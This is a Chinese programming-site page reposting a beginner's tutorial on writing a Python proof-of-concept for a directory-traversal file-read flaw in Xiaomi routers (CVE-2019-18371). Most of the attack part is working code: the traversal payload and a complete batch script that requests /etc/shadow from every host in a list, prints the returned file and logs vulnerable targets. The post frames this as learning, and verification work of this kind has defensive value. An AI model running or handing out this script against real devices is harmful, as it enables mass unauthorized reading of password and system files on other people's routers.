iis服务器助手广告广告

扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 后端开发 > Python >用Python写漏洞验证脚本的代码
  • 476

0
分享到

用Python写漏洞验证脚本的代码

2024-04-02 19:04:59 476人浏览 八月长安

Python 官方文档:入门教程 => 点击学习

摘要

小白尝试写任意文件读取poc 我是一个小白,完全不懂python,但是Python在渗透中往往是一个重要的角色。有一个CSDN百万大佬写了这样一句话,不会编程的渗透都是耍流氓。我虽然

小白尝试写任意文件读取poc

我是一个小白,完全不懂python,但是Python在渗透中往往是一个重要的角色。
有一个CSDN百万大佬写了这样一句话,不会编程的渗透都是耍流氓。
我虽然菜但是也想尝试学习写一下Python漏洞的poc和exp。

我是在网上找到的学习方法,随便记录一下。尝试写一个批量验证漏洞的poc
发现小米路由器有一个任意文件读取漏洞,学着写了看看

小米路由器远程任意文件读取漏洞
小米路由器远程任意文件读取漏洞(CVE-2019-18371)
小米路由器的Nginx的配置文件错误,导致目录穿越漏洞实现任意文件读取。
可通过访问Http://domain.cn/xxx…/etc/passwd实现目录穿越访问上级目录及其子目录文件。
如访问http://192.168.1.1/api-third-party/download/extdisks…/etc/passwd 便可以读取到passwd文件。

写一个批量验证漏洞的poc
第一步实现域名和payload拼接
已知payload=/api-third-party/download/extdisks…/etc/passwd

域名和payload拼接如下

import requests
import time
def poc_check(poc):
    for url in open('xiaomi.txt'):
        url = url.replace('\n','')
        poc_url=url+poc
        print(poc_url) # 把域名和payload拼接成一个完整的域名,然后去请求如果返回200就说明存在漏洞。
if __name__=='__main__':
    poc_xiaomi='/api-third-party/download/extdisks../etc/shadow'
    poc_check(poc_xiaomi)

图片如下

在这里插入图片描述

拼接好的域名尝试访问,如果返回200代表访问成功说明能读取到文件说明存在漏洞
返回其他的状态码就代表不存在漏洞
完整代码如下:

import requests
import time

def poc_check(poc):
    for url in open('xiaomi.txt'):
        url = url.replace('\n','')
        poc_url=url+poc
        # print(poc_url) # 把域名和payload拼接成一个完整的域名,然后去请求如果返回200就说明存在漏洞。
        try:
            print("再也没有留恋的斜阳")
            print("正在检测:")
            print(poc_url)
            poc_data=requests.get(poc_url)
            if poc_data.status_code==200:
                print(poc_data.content.decode('utf-8'))
                with open(r'xiaomivuln.txt','a+') as f:
                    f.write(poc_url+'\n')
                    f.close()
        except Exception as e:
            time.sleep(0.1)
            pass
if __name__=='__main__':
    poc_xiaomi='/api-third-party/download/extdisks../etc/shadow'
    # poc_xiaomi1='/api-third-party/download/extdisks../etc/passwd'
    poc_check(poc_xiaomi)
    # poc_check(poc_xiaomi1)

在这里插入图片描述

写完了,我太水了的是照着别人写的

到此这篇关于用Python写漏洞验证脚本的文章就介绍到这了,更多相关Python验证脚本内容请搜索编程网以前的文章或继续浏览下面的相关文章希望大家以后多多支持编程网!

您可能感兴趣的文档:
点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: 用Python写漏洞验证脚本的代码

本文链接: https://www.lsjlt.com/news/138563.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
去做题
猜你喜欢
  • 用Python写漏洞验证脚本的代码
    小白尝试写任意文件读取poc 我是一个小白,完全不懂Python,但是Python在渗透中往往是一个重要的角色。有一个CSDN百万大佬写了这样一句话,不会编程的渗透都是耍流氓。我虽然...
    99+
    2024-04-02
  • 用Python编写一个漏洞验证脚本
    目录前言requests模块使用技巧验证结果单线程poc脚本使用多线程颜色标记添加进度条多线程poc脚本总结前言 我们实战经常会遇到以下几个问题: ​ 1、遇到一个利用步骤十分繁琐的...
    99+
    2024-04-02
  • Python编写漏洞验证脚本批量测试繁琐漏洞
    目录前言requests模块使用技巧取消重定向SSL证书验证代理保持cookie验证结果单线程poc脚本使用多线程颜色标记添加进度条多线程poc脚本前言 我们实战经常会遇到以下几个问...
    99+
    2024-04-02
  • POC漏洞批量验证程序Python脚本编写
    目录编写目的需求分析实现过程Main函数获取目标批量请求验证加载POC多线程类urlParsegetProxyrandomHeaders输出结果其他全局变量命令行读取参数poc详情显...
    99+
    2024-04-02
  • Python实现POC漏洞批量验证程序的脚本怎么写
    这篇文章主要介绍“Python实现POC漏洞批量验证程序的脚本怎么写”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“Python实现POC漏洞批量验证程序的脚本怎么写”文章能帮助大家解决问题。需求分析...
    99+
    2023-06-29
  • Python漏洞验证程序Poc利用入门到实战编写
    目录01 什么是poc02 什么是EXP03 关于 PoC/Exp 的两个误区04 PoC 编写流程05 Poc编写中涉及到的一些库06 Web漏洞Poc编写基本方法07 实战漏洞P...
    99+
    2024-04-02
  • Python中怎么用Poc验证程序漏洞
    这篇文章主要讲解了“Python中怎么用Poc验证程序漏洞”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“Python中怎么用Poc验证程序漏洞”吧!01 什么是pocPoC(全称: Proo...
    99+
    2023-06-29
  • JavaScript实现登陆验证码的脚本怎么写
    今天小编给大家分享一下JavaScript实现登陆验证码的脚本怎么写的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。填写输入信...
    99+
    2023-06-27
  • Python+selenium破解拼图验证码的脚本
    目录实现思路核心代码实现思路 很多网站都有拼图验证码 1.首先要了解拼图验证码的生成原理 2.制定破解计划,考虑其可能性和成功率。 3.编写脚本 很多网站的拼图验证码都是直接借助第三...
    99+
    2024-04-02
  • Python自动化脚本代码如何写
    这篇文章主要讲解了“Python自动化脚本代码如何写”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“Python自动化脚本代码如何写”吧!1、自动化阅读网页新闻这个脚本能够实现从网页中抓取文本...
    99+
    2023-07-06
  • jQuery表单验证的代码怎么写
    这篇文章主要介绍“jQuery表单验证的代码怎么写”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“jQuery表单验证的代码怎么写”文章能帮助大家解决问题。 jQu...
    99+
    2024-04-02
  • Python脚本开发漏洞的批量搜索与利用方法
    这篇文章主要介绍“Python脚本开发漏洞的批量搜索与利用方法”,在日常操作中,相信很多人在Python脚本开发漏洞的批量搜索与利用方法问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”Python脚本开发漏洞的...
    99+
    2023-06-30
  • python10.4备份脚本的代码怎么写
    python10.4备份脚本的代码怎么写,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。版本四的代码是相当长的,所以很多人对其有束手无策之感,但是你通过以下的代码对其,有更好...
    99+
    2023-06-17
  • Python得到代码执行时间脚本怎么写
    Python得到代码执行时间脚本怎么写,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。得到代码执行时间脚本:import timet0 = time.time()...
    99+
    2023-06-04
  • 如何用三行Python代码实现验证码识别
    这篇文章主要介绍了如何用三行Python代码实现验证码识别的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇如何用三行Python代码实现验证码识别文章都会有所收获,下面我们一起来看看吧。源码如下:调试:输出:关于...
    99+
    2023-06-04
  • 怎么写Python代码提高数据处理脚本速度
    这篇文章主要介绍“怎么写Python代码提高数据处理脚本速度”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“怎么写Python代码提高数据处理脚本速度”文章能帮助大家解决问题。普通Python处理数据...
    99+
    2023-06-29
  • Python脚本开发漏洞的批量搜索与利用(GlassFish 任意文件读取)
    目录Python 开发学习的意义:(1)学习相关安全工具原理.(2)掌握自定义工具及拓展开发解决实战中无工具或手工麻烦批量化等情况.(3)在二次开发 Bypass,日常任务,批量测试...
    99+
    2024-04-02
  • 简单的SQL Server备份脚本代码怎么写
    本篇文章给大家分享的是有关简单的SQL Server备份脚本代码怎么写,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。一般的情况下我们会选用SQ...
    99+
    2024-04-02
  • 如何写个设置命令的VBS脚本代码
    这篇文章将为大家详细讲解有关如何写个设置命令的VBS脚本代码,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。代码如下:'将以下代码复制并保存为"系统命令.VBS",并运行安装。 ...
    99+
    2023-06-08
  • 用python写一个抢购的脚本
    好的,这是用 Python 写的一个抢购的脚本的示例: import requestsdef main(): # 在这里输入你的抢购商品的 URL url = "http://www.example.com/product/123" ...
    99+
    2023-10-05
    java 开发语言
软考高级职称资格查询
iis服务器助手广告
软考职称历年真题下载
软考职称资料下载
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作